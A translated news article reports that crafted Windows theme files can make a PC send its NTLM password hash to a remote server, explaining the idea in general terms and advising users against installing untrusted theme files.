Windows

They detect a threat that uses "prepared" themes in Windows to steal the access passwords of our computer

2024
They detect a threat that uses "prepared" themes in Windows to steal the access passwords of our computer

Table of contents:

Anonim

Being able to change the appearance of our equipment is one of the aspects that users like the most. Changing your desktop layout is as easy as downloading and applying a theme. And in fact, here we have seen the themes and designs that, for example, Microsoft has been launching periodically in its application store.

"

Windows 10 themes and theme packs offer a large number of options and almost all of them are safe, especially those released by Microsoft.And we refer to that almost all when talking about security, due to the discovery of a researcher who has found specially designed themes to steal our passwords "

Pass-the-Hash Attacks

Themes allow to change almost any aspect of our desktop Colors, backgrounds, icons, cursor... almost everything can be modified by themes that are download or that we customize ourselves. Themes create a configuration that is stored in the path AppData%\Microsoft\Windows\Themes as a file with a .theme extension.

"

The result, the file with the .theme extension, can be shared with other users and this is where the problem discovered by the researcher @bohops on his Twitter account lies. Themes specially packaged to perform a Pass-the-Hash (PtH) attack on our computers."

Easy attacks to carry out and so much so that at Bleeping Computer they have followed this method and have managed to obtain the password without further complications.

A type of attack that seeks to steal credentials in order to gain access to other system components with the aim of gaining total control of it and access to all types of information that we store and that circulate through the operating system.

The attacker tries to access and get the login credentials on the computer so that, once achieved, he can identify himself on other computers connected to the network. It is a question of accessing the hash values ​​of the password and in this way being able to access all kinds of services. In this case, it is not a question of accessing the password in plain text, but rather the NTLM hash, which makes the attack easier to carry out.

In this case, this modified .theme file does is change the settings so that the theme has to search for a resource or a remote file that requires authentication. At that point when you try to access that file remotely, it will automatically try to login by sending the NTLM hash and the Windows account username.

In this situation, the solution recommended by the discoverer of the threat is to do not download or install files with these extensions, especially when They come from untrustworthy sites. Another, more extreme, measure involves blocking all .theme, .themepack file extensions. and .desktopthemepackfile, but in this way we will not be able to change the themes on our computer.

Via | Bleeping Computer

Windows

Editor's choice

Is HTC losing interest in Windows Phone?

Is HTC losing interest in Windows Phone?

2024
Samsung Ativ Q

Samsung Ativ Q

2024
Images of what could be the new Nokia Lumia EOS

Images of what could be the new Nokia Lumia EOS

2024
Build 2013 devices: waiting for manufacturers

Build 2013 devices: waiting for manufacturers

2024
Back to top button